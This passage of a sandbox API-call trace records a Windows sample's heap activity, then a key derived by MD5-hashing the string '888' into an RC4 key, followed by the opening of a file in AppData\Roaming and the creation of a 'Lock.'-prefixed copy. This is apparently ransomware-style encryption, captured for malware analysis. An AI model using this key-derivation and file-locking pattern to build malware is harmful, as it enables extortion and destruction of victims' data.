hHeap=0x2af0000) returned 1 [0151.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0151.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0151.990] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0151.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0151.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0151.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0151.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0151.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0151.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0151.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0151.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0151.990] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0151.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0151.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0151.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0151.990] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0151.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0151.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0151.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0151.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0151.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0151.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0151.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0151.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0151.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0151.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0151.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0151.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0151.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0151.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0151.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0151.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0151.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0151.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0151.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0151.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0151.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0151.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0151.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0151.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0151.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0151.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0151.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0151.991] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0151.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0151.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0151.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0151.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0151.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0151.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0151.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0151.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0151.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0151.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0151.992] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0151.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0151.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0151.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0151.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0151.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0151.992] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0151.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0151.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0151.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0151.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0151.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0151.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0151.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0151.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0151.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0151.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0151.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0151.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0151.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0151.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0152.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0152.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0152.002] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0152.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0152.002] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.002] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.002] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0152.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f40, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0152.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0152.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6f80, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0152.003] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf000) returned 1 [0152.003] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0152.004] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0152.004] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0152.004] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0152.004] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0152.004] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0152.004] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0152.004] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0152.004] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0152.004] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0152.004] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0152.004] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0152.004] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.004] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.004] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0152.004] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0152.004] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0152.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa438, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0152.004] CryptCreateHash (in: hProv=0x9bf000, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0152.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0152.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0152.005] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0152.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0152.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d38, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0152.005] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.005] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.005] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0152.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa348, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0152.005] CryptHashData (hHash=0x9e1eb8, pbData=0x2a71d28, dwDataLen=0x3, dwFlags=0x1) returned 1 [0152.005] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.005] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.005] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0152.005] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0152.005] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0152.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa498, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0152.005] CryptDeriveKey (in: hProv=0x9bf000, Algid=0x6601, hBaseData=0x9e1eb8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1ef8) returned 1 [0152.005] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.005] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.006] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0152.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0152.006] CryptDestroyHash (hHash=0x9e1eb8) returned 1 [0152.006] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/WvHidWJPV.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\wvhidwjpv.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0152.006] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.007] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0152.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0152.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0152.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0152.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0152.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0152.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0152.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0152.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0152.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0152.007] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0152.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0152.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0152.007] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0152.007] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0152.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0152.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0152.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0152.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0152.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0152.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0152.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0152.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0152.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0152.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0152.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0152.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0152.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0152.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0152.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0152.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0152.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0152.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0152.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0152.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0152.008] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0152.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0152.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0152.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0152.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0152.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0152.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0152.008] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.WvHidWJPV.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.wvhidwjpv.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f8 [0152.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7220 [0152.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0152.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0152.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0152.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0152.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0152.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0152.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0152.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0152.009] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0152.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0152.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0152.009] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0152.009] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 